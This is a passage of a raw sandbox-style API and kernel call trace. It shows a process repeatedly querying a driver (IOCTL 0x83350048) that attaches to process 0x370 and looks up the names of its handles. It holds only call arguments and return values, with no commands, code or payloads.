0x0 [0140.363] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.363] ObReferenceObjectByHandle (in: Handle=0x7b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a18730, HandleInformation=0x0) returned 0x0 [0140.363] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.363] PsReleaseProcessExitSynchronization () returned 0x2 [0140.363] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.364] ObQueryNameString (in: Object=0xfffffa8003a18730, ObjectNameInfo=0xfffffa8002f93044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f93044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.364] ObfDereferenceObject (Object=0xfffffa8003a18730) returned 0x1 [0140.364] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.364] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.364] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0140.364] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.364] PsAcquireProcessExitSynchronization () returned 0x0 [0140.364] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.364] ObReferenceObjectByHandle (in: Handle=0x7d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a1cf20, HandleInformation=0x0) returned 0x0 [0140.364] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.365] PsReleaseProcessExitSynchronization () returned 0x2 [0140.365] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.365] ObQueryNameString (in: Object=0xfffffa8003a1cf20, ObjectNameInfo=0xfffffa8002f94044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f94044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.365] ObfDereferenceObject (Object=0xfffffa8003a1cf20) returned 0x1 [0140.365] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.365] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.365] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0140.365] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.365] PsAcquireProcessExitSynchronization () returned 0x0 [0140.366] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.366] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a1bf20, HandleInformation=0x0) returned 0x0 [0140.366] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.366] PsReleaseProcessExitSynchronization () returned 0x2 [0140.366] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.366] ObQueryNameString (in: Object=0xfffffa8003a1bf20, ObjectNameInfo=0xfffffa8002f95044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f95044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.366] ObfDereferenceObject (Object=0xfffffa8003a1bf20) returned 0x1 [0140.366] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.366] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.366] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0140.367] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.367] PsAcquireProcessExitSynchronization () returned 0x0 [0140.367] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.367] ObReferenceObjectByHandle (in: Handle=0x7f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a1cc80, HandleInformation=0x0) returned 0x0 [0140.367] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.367] PsReleaseProcessExitSynchronization () returned 0x2 [0140.368] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.368] ObQueryNameString (in: Object=0xfffffa8003a1cc80, ObjectNameInfo=0xfffffa8002f9a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9a044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.368] ObfDereferenceObject (Object=0xfffffa8003a1cc80) returned 0x1 [0140.368] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.368] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.368] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0140.368] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.368] PsAcquireProcessExitSynchronization () returned 0x0 [0140.368] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.368] ObReferenceObjectByHandle (in: Handle=0x8fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034d13f0, HandleInformation=0x0) returned 0x0 [0140.368] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.369] PsReleaseProcessExitSynchronization () returned 0x2 [0140.369] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.369] ObQueryNameString (in: Object=0xfffffa80034d13f0, ObjectNameInfo=0xfffffa8002f9b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9b044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.369] ObfDereferenceObject (Object=0xfffffa80034d13f0) returned 0x1 [0140.369] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.369] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.369] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0140.369] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.369] PsAcquireProcessExitSynchronization () returned 0x0 [0140.369] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.369] ObReferenceObjectByHandle (in: Handle=0x954, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003992f20, HandleInformation=0x0) returned 0x0 [0140.370] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.370] PsReleaseProcessExitSynchronization () returned 0x2 [0140.370] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.370] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0140.370] ObfDereferenceObject (Object=0xfffffa8003992f20) returned 0x12 [0140.370] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.370] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.370] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0140.370] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.370] PsAcquireProcessExitSynchronization () returned 0x0 [0140.370] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.371] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003992210, HandleInformation=0x0) returned 0x0 [0140.371] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.371] PsReleaseProcessExitSynchronization () returned 0x2 [0140.371] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.371] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.371] ObfDereferenceObject (Object=0xfffffa8003992210) returned 0x12 [0140.371] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.371] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.371] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0140.371] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.371] PsAcquireProcessExitSynchronization () returned 0x0 [0140.371] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.371] ObReferenceObjectByHandle (in: Handle=0x95c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003992530, HandleInformation=0x0) returned 0x0 [0140.371] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.372] PsReleaseProcessExitSynchronization () returned 0x2 [0140.372] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.372] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f85044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f85044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.372] ObfDereferenceObject (Object=0xfffffa8003992530) returned 0x12 [0140.372] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.372] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.372] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0140.372] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.372] PsAcquireProcessExitSynchronization () returned 0x0 [0140.372] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.372] ObReferenceObjectByHandle (in: Handle=0x960, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003992680, HandleInformation=0x0) returned 0x0 [0140.372] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.372] PsReleaseProcessExitSynchronization () returned 0x2 [0140.372] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.372] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.373] ObfDereferenceObject (Object=0xfffffa8003992680) returned 0x5 [0140.373] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.373] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.373] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0140.373] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.373] PsAcquireProcessExitSynchronization () returned 0x0 [0140.373] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.373] ObReferenceObjectByHandle (in: Handle=0x964, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039923e0, HandleInformation=0x0) returned 0x0 [0140.373] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.373] PsReleaseProcessExitSynchronization () returned 0x2 [0140.373] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.373] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.373] ObfDereferenceObject (Object=0xfffffa80039923e0) returned 0x19 [0140.373] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.373] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.373] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.374] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0140.374] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.374] PsAcquireProcessExitSynchronization () returned 0x0 [0140.374] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.374] ObReferenceObjectByHandle (in: Handle=0x9a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034b7070, HandleInformation=0x0) returned 0x0 [0140.374] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.374] PsReleaseProcessExitSynchronization () returned 0x2 [0140.374] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.374] ObQueryNameString (in: Object=0xfffffa80034b7070, ObjectNameInfo=0xfffffa8002f7f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7f044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.374] ObfDereferenceObject (Object=0xfffffa80034b7070) returned 0x1 [0140.374] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.374] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.374] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.374] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0140.374] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.374] PsAcquireProcessExitSynchronization () returned 0x0 [0140.375] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.375] ObReferenceObjectByHandle (in: Handle=0xa70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002f796c0, HandleInformation=0x0) returned 0x0 [0140.375] ObfDereferenceObject (Object=0xfffffa8002f796c0) returned 0x17 [0140.375] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.375] PsReleaseProcessExitSynchronization () returned 0x2 [0140.375] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.375] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.375] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.375] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0140.375] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.375] PsAcquireProcessExitSynchronization () returned 0x0 [0140.375] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.375] ObReferenceObjectByHandle (in: Handle=0xa78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034f5070, HandleInformation=0x0) returned 0x0 [0140.375] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.376] PsReleaseProcessExitSynchronization () returned 0x2 [0140.376] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.376] ObQueryNameString (in: Object=0xfffffa80034f5070, ObjectNameInfo=0xfffffa8003000044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003000044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.376] ObfDereferenceObject (Object=0xfffffa80034f5070) returned 0x1 [0140.376] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.376] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.376] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0140.376] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.376] PsAcquireProcessExitSynchronization () returned 0x0 [0140.376] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.376] ObReferenceObjectByHandle (in: Handle=0xba0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a2b960, HandleInformation=0x0) returned 0x0 [0140.376] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.376] PsReleaseProcessExitSynchronization () returned 0x2 [0140.377] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.377] ObQueryNameString (in: Object=0xfffffa8003a2b960, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.377] ObfDereferenceObject (Object=0xfffffa8003a2b960) returned 0x1 [0140.377] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.377] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.377] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0140.377] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.377] PsAcquireProcessExitSynchronization () returned 0x0 [0140.377] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.377] ObReferenceObjectByHandle (in: Handle=0xef4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800216b3b0, HandleInformation=0x0) returned 0x0 [0140.377] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.378] PsReleaseProcessExitSynchronization () returned 0x2 [0140.378] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.378] ObQueryNameString (in: Object=0xfffffa800216b3b0, ObjectNameInfo=0xfffffa8002f2b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2b044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.378] ObfDereferenceObject (Object=0xfffffa800216b3b0) returned 0x2 [0140.378] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.378] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.378] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0140.378] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.378] PsAcquireProcessExitSynchronization () returned 0x0 [0140.378] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.378] ObReferenceObjectByHandle (in: Handle=0x1048, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002872240, HandleInformation=0x0) returned 0x0 [0140.379] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.379] PsReleaseProcessExitSynchronization () returned 0x2 [0140.379] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.379] ObQueryNameString (in: Object=0xfffffa8002872240, ObjectNameInfo=0xfffffa8003001044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003001044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.379] ObfDereferenceObject (Object=0xfffffa8002872240) returned 0x2 [0140.379] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.379] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: 